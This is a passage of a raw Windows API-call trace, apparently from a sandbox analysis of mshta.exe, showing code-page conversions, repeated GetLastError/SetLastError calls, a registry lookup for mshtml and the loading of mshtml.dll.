¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼌?Ā", cchSrc=256, lpDestStr=0x18eec8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0060.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18f5ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x98\x94ÝÙäø\x18", lpUsedDefaultChar=0x0) returned 256 [0060.727] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x97b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0060.727] GetLastError () returned 0x0 [0060.727] SetLastError (dwErrCode=0x0) [0060.727] GetLastError () returned 0x0 [0060.727] SetLastError (dwErrCode=0x0) [0060.727] GetLastError () returned 0x0 [0060.727] SetLastError (dwErrCode=0x0) [0060.727] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c8) returned 0x5a1610 [0060.741] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.755] SetLastError (dwErrCode=0x0) [0060.755] GetLastError () returned 0x0 [0060.755] SetLastError (dwErrCode=0x0) [0060.755] GetLastError () returned 0x0 [0060.755] SetLastError (dwErrCode=0x0) [0060.755] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x5fc) returned 0x5a17e0 [0060.755] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a0e78 | out: hHeap=0x5a0000) returned 1 [0060.757] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x972aef) returned 0x0 [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.758] GetLastError () returned 0x0 [0060.758] SetLastError (dwErrCode=0x0) [0060.758] GetLastError () returned 0x0 [0060.758] SetLastError (dwErrCode=0x0) [0060.758] GetLastError () returned 0x0 [0060.758] SetLastError (dwErrCode=0x0) [0060.758] GetVersion () returned 0x1db10106 [0060.758] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0060.758] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0060.758] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.758] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x105) returned 0x5a1de8 [0060.758] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x105) returned 0x5a0e78 [0060.758] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x18f944 | out: phkResult=0x18f944*=0x42) returned 0x0 [0060.759] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x18f93c, lpData=0x5a1de8, lpcbData=0x18f938*=0x105 | out: lpType=0x18f93c*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x18f938*=0x1f) returned 0x0 [0060.759] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x74af0000 [0064.988] GetProcessHeap () returned 0x610000 [0064.988] GetVersion () returned 0x1db10106 [0064.988] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0064.988] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0064.988] HeapSetInformation (HeapHandle=0x610000, HeapInformationClass=0x0, HeapInformation=0x18f5d0, HeapInformationLength=0x4) returned 1 [0064.989] malloc (_Size=0x80) returned 0x3b2640 [0064.989] GetVersion () returned 0x1db10106 [0064.989] GetVersionExA (in: lpVersionInformation=0x18f4a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f4a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0064.989] __dllonexit () returned 0x74d1717c [0064.989] __dllonexit () returned 0x74d173bd [0064.989] GetProcessHeap () returned 0x610000 [0064.990] __dllonexit () returned 0x74d17435 [0064.990] __dllonexit () returned 0x74d16e75 [0064.990] __dllonexit () returned 0x74d16ff5 [0064.990] __dllonexit () returned 0x74d171be [0064.990] __dllonexit () returned 0x74d172e2 [0064.990] __dllonexit () returned 0x74d17320 [0064.990] __dllonexit () returned 0x74d17370 [0064.990] __dllonexit () returned 0x74d16e53 [0064.991] __dllonexit () returned 0x74d16e66 [0064.991] __dllonexit () returned 0x74d16a3e [0064.991] __dllonexit () returned 0x74d16a46 [0064.991] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0064.991] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0064.991] __dllonexit () returned 0x74d16a60 [0064.991] __dllonexit () returned 0x74d16a7a [0064.991] __dllonexit () returned 0x74d16a93 [0064.991] __dllonexit () returned 0x74d16aa7 [0064.991] __dllonexit () returned 0x74d16ac1 [0064.992] __dllonexit () returned 0x74d171f1 [0064.992] __dllonexit () returned 0x74d16ad0 [0064.992] __dllonexit () returned 0x74d16adf [0064.992] __dllonexit () returned 0x74d16aee [0064.992] __dllonexit () returned 0x74d16afd [0064.992] __dllonexit () returned 0x74d16b0d [0064.992] __dllonexit () returned 0x74d1720c [0064.992] __dllonexit () returned 0x74d16b1c [0064.992] __dllonexit () returned 0x74d16b2f [0064.993] __dllonexit () returned 0x74d16b49 [0064.993] __dllonexit () returned 0x74d16b58 [0064.993] __dllonexit () returned 0x74d16b67 [0064.993] __dllonexit () returned 0x74d16b76 [0064.993] __dllonexit () returned 0x74d16b85 [0064.993] __dllonexit () returned 0x74d16b94 [0064.993] __dllonexit () returned 0x74d16ba3 [0064.993] __dllonexit () returned 0x74d16bb2 [0064.993] __dllonexit () returned 0x74d16bc1 [0064.993] __dllonexit () returned 0x74d16bd0 [0064.994] __dllonexit () returned 0x74d16bdf [0064.994] __dllonexit () returned 0x74d16bee [0064.994] __dllonexit () returned 0x74d16bfd [0064.994] __dllonexit () returned 0x74d16c0c [0064.994] __dllonexit () returned 0x74d16c1b [0064.994] __dllonexit () returned 0x74d16c2a [0064.994] __dllonexit () returned 0x74d16c3d [0064.994] __dllonexit () returned 0x74d16c4c [0064.994] __dllonexit () returned 0x74d16c5b [0064.995] __dllonexit () returned 0x74d16c75 [0064.995] __dllonexit () returned 0x74d16c8f [0064.995] __dllonexit () returned 0x74d16ca9 [0064.995] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0064.995] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0064.995] __dllonexit () returned 0x74d16cb1 [0064.996] __dllonexit () returned 0x74d17294 [0064.996] __dllonexit () returned 0x74d16ccb [0064.996] __dllonexit () returned 0x74d16cd3 [0064.996] __dllonexit () returned 0x74d16ce2 [0064.996] __dllonexit () returned 0x74d16cf1 [0064.996] __dllonexit () returned 0x74d16d00 [0064.996] __dllonexit () returned 0x74d0f72d [0064.996] __dllonexit () returned 0x74d16d43 [0064.997] __dllonexit () returned 0x74d16d56 [0064.997] __dllonexit () returned 0x74d0f095 [0064.997] __dllonexit () returned 0x74d16d65 [0064.997] __dllonexit () returned 0x74d16d78 [0064.997] __dllonexit () returned 0x74d16d87 [0064.997] __dllonexit () returned 0x74d16d9a [0064.997] __dllonexit () returned 0x74d12256 [0064.998] __dllonexit () returned 0x74d1679d [0064.998] __dllonexit () returned 0x74d16dd5 [0064.998] __dllonexit () returned 0x74d16df8 [0064.998] 